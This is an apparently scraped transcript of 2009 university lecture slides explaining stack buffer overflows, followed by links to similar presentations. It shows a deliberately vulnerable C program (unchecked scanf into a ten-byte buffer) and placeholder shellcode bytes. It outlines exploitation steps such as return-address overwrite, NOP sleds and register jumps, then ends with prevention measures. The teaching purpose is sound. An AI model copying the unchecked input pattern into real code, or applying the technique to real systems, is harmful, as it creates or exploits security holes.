Presentation is loading. Please wait.

Presentation is loading. Please wait.

Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009."— Presentation transcript:

1 Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009

2 02/20/092 Welcome  Introduction  Topics to be covered  Useful areas of existing knowledge

3 02/20/093 Security Flaws  User input? Buffer overflow!  One of the most common coding flaws int main() { char szName[10]; printf(“Please enter your name: ”); scanf(“%s”, szName); printf(“Hello, %s!”, szName); return 0; }

4 02/20/094 Buffer Overflows  What is a buffer overflow?  How does it work?  “The stack”  Last In First Out “buffer”/area of memory  Stack addressing: largest first  Stores data, parameters and return addresses

5 02/20/095 The Stack  Section of the stack (representative) data data data data data data data data data buffer data data data prev ebpreturn address 0x00004C00 0x00004C4F 0x00004C0F 0x00004C10 0x00004C20 0x00004C30 0x00004C40 0x00004C1F 0x00004C2F 0x00004C3F data data data data data data data 0x00004C50 0x00004C5F free free free free free free free 0x00004BFF0x00004BF0 ebp points here

6 02/20/096 The Stack  How does this relate to code? data data data data data data data databuffer data ebpreturn addr. int main() { char szName[10]; printf(“Please enter your name: ”); scanf(“%s”, szName); printf(“Hello, %s!”, szName); return 0; }

7 02/20/097 Buffer Overflow  Short names work: they fit in the buffer: data data Ian Kayne\0  Long names will break the code: data data 1234 56789A return address AAAAAAAAAAAA

8 02/20/098 Buffer Overflow  Interesting error, look closely!  Big security warning!

9 02/20/099 Buffer Overflow  Look at our stack representation again: data data buffer data data data frame pointerreturn address First we filled the buffer… 0 1 2 3 4 5 6 7 8 9 then we overflowed to the return address A A A A A

10 02/20/0910 Buffer Overflow  0x41414141 is “41 41 41 41” in memory, the ASCII code for “AAAA”

11 02/20/0911 Buffer Overflow  Why do we want a buffer overflow?  Code execution  Victim process’s security context  How do we get from crash to code?

12 02/20/0912 Buffer Overflow - Review  Recap:  “Grow downwards” – largest address first  Stack stores data  Every function call has a return address pushed to the stack (pointed to by x86 ebp)  Unchecked data lengths can overflow buffers  Overflow and overwrite the return address  So how do we get from crash to code?

13 02/20/0913 Buffer Overflow  Executable stack  Provide shellcode/payload as buffer input  Overwrite return address with buffer addr.  What is shellcode?  Difference between asm, machine code, shellcode  NULLs, high ASCII etc…

14 02/20/0914 Buffer Overflow  First, write our shellcode: Pseudocode: GetUsername(); ElevatePrivilege(); Pseudo-shellcode: \x6a\x35\x59\xe8\xff \xc1\x5e\x30\x4c\x0e  Metasploit and other tools make this easy!  Append address pointing to start of buffer Pseudo-shellcode: \x6a\x35\x59\xe8\xff \xc1\x5e\x30\x4c\x0e \x2C\x4C\x00\x00

15 02/20/0915 Buffer Overflow  Our shellcode maps to the stack layout: data return address \x6a\x35\x59\xe8\xff\xc1\x5e\x30\x4c\x0e\x2C\x4C\x00\x00 int main() { char szName[10]; printf(“Please enter your name: ”); scanf(“%s”, szName); printf(“Hello, %s!”, szName); return 0; }

16 02/20/0916 Buffer Overflow  One mystery left!  What is \x2C\x4C\x00\x00 ? data data data data data data data data data buffer data data data 0x00004C10 0x00004C20 0x00004C30 0x00004C1F 0x00004C2F 0x00004C3F  Endian-ness – 0x00004c2c

17 02/20/0917 Buffer Overflow  Buffer Overflow Demonstration

18 02/20/0918 Metasploit

19 02/20/0919 Metasploit

20 02/20/0920 Metasploit

21 02/20/0921 Buffer Overflow  Direct jump is unreliable  Rebasing (especially DLLs)  “NOP sleds”  NOP sled, then…  Shellcode, then…  Relative jump to shellcode somewhere in NOP sled  Better method is jump using register

22 02/20/0922 Buffer Overflow  Jump using register  Any register can point at the start of the buffer  Inject shellcode to buffer as normal  Overwrite return address with address of instructions that jump using the register  Near-guaranteed success! data shellcodereturn address EAX test ecx, ecx jmp eax push 12345678

23 02/20/0923 Prevention  Non-executable stack (“NX bit”)  Address randomisation  Canary bytes data return address

24 02/20/0924 Buffer Overflow  Recap and review  There is a lot more to buffer overflows, some detail has been cut out for clarity.  Stack diagrams are representation only and are not technically accurate  Metasploit (www.metasploit.com)  “Smashing the stack for fun and profit”  http://insecure.org/stf/smashstack.html

25 02/20/0925 Buffer Overflows  Basic principles  Flaw possible with any buffer operations  User input  Data load from disk  Data from network

26 02/20/0926 Review  Thank you!  Questions  Comments  Items to review  Further study

Download ppt "Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009."

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Functions Functions and Parameters. History A function call needs to save the registers in use The called function will use the registers The registers.

Functions Functions and Parameters. History A function call needs to save the registers in use The called function will use the registers The registers.
CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson

CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Software and Security Buffer Overflow 1.

Software and Security Buffer Overflow 1.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Computer Security Buffer Overflow lab Eu-Jin Goh.

Computer Security Buffer Overflow lab Eu-Jin Goh.
Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.

Netprog: Buffer Overflow1 Buffer Overflow Exploits Taken shamelessly from: netprog/overflow.ppt.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
Buffer overflows.

Buffer overflows.
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.

Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.

Lecture 0 Appendix on Implementation Threats Material from Warren Page & Chpt 11, Information Security by Mark Stamp.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

Similar presentations

Ads by Google